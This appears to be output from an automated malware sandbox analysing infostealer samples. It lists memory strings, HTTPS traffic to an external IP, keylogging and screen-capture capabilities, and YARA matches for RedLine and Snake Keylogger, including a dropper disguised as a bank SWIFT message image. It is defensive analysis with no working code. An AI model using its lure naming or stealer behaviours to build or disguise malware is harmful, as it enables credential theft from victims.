Source: Native_New-Nova.exe, 00000009.00000002.2953521524.0000000002261000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2963089780.00000000035D1000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2954150757.00000000023E0000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000003.1730790993.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2956686994.00000000026BC000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000009.00000002.2964658526.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.00000000024A0000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2969436130.0000000004930000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000003.1732371805.0000000000768000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2970078800.00000000049D0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2953656770.0000000002100000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2951469963.0000000002101000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.000000000250A000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2964034510.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000003.1775462812.000000000059F000.00000004.00000020.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2962477768.0000000003421000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2965310039.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2954940699.00000000021E0000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000003.1776206771.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969063278.00000000049C0000.00000004.08000000.00040000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2969184624.0000000004A10000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Native_snake01.exe, 00000011.00000002.2957921883.00000000025D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: Native_snake01.exe, 0000000A.00000002.2956341043.0000000002510000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.00000000024CA000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.0000000002539000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.0000000002668000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.00000000025FA000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.000000000263F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: Native_New-Nova.exe, 00000009.00000002.2956686994.00000000026BC000.00000004.00000800.00020000.00000000.sdmp, Native_New-Nova.exe, 00000010.00000002.2954971703.000000000250A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003857000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.0000000003733000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.000000000362A000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.000000000347C000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.0000000003652000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.000000000268B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.000000000375A000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.0000000003862000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.000000000370C000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.0000000003986000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: Native_snake01.exe, 0000000A.00000002.2961342775.000000000380F000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000035B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.000000000370E000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.000000000362D000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.0000000003457000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.000000000375C000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.0000000003587000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.000000000393F000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.0000000003712000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.000000000383D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003857000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.0000000003733000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.000000000362A000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2956341043.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.000000000347C000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.0000000003652000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000035DD000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.000000000268B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.000000000375A000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.0000000003862000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.000000000370C000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.0000000003986000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.0000000003781000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: Native_snake01.exe, 0000000A.00000002.2961342775.000000000380F000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000035B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.000000000370E000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.000000000362D000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.0000000003457000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.000000000375C000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.0000000003587000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.000000000393F000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.0000000003712000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000036E7000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.000000000383D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003785000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Native_snake01.exe, 0000000A.00000002.2961342775.0000000003785000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 0000000A.00000002.2961342775.00000000037B8000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038E9000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2961903524.00000000038B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Native_snake01.exe, 0000000A.00000002.2956341043.000000000255B000.00000004.00000800.00020000.00000000.sdmp, Native_snake01.exe, 00000011.00000002.2957921883.000000000268B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 63642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63649
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63653 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 63655 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63642
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63645
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 63645 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63649 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63650
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63650 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63654
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63653
Source: unknown	Network traffic detected: HTTP traffic on port 63654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63655

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:63653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:63655 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, UltraSpeed.cs

.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, UltraSpeed.cs

.Net Code: VKCodeToUnicode

Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Window created: window name: CLIPBRDWNDCLASS

Source: C:\Users\user\AppData\Local\Temp\Native_snake01.exe

Code function: 10_2_0917A1A8 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,

10_2_0917A1A8

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.0.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.0.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.214183e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.4a80000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.4a80f08.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.23e0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.3425570.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.3.Native_New-Nova.exe.5993e8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.Ziraat_Bankasi_Swift_Messaji.png.exe.2864740.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.49d0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.4a80f08.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.2142746.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.4a80000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.22a2746.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.214183e.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.2221216.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.3600190.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.4a10000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.BZTCUCKTKd.exe.16a46b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.4a10000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.49c0f20.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.3.Native_New-Nova.exe.59f268.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.Native_snake01.exe.4930f20.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.22a183e.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.0.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.49c0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.35d5570.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Native_New-Nova.exe.35d5570.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.3426478.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.35d6478.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.3.Native_New-Nova.exe.59f268.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.22a2746.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Native_New-Nova.exe.4b10000.8.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.4930f20.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.2221216.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.Native_snake01.exe.4930000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.Native_New-Nova.exe.3425570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.Native_snake01.exe.49d0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.0.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.50b0000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.Native_New-Nova.exe.3450190.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.22a183e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.3.Native_snake01.exe.680768.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.Native_snake01.exe.22202f6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 17.2.Native_snake01.exe.49c0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Native_New-Nova.exe.35d6478.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
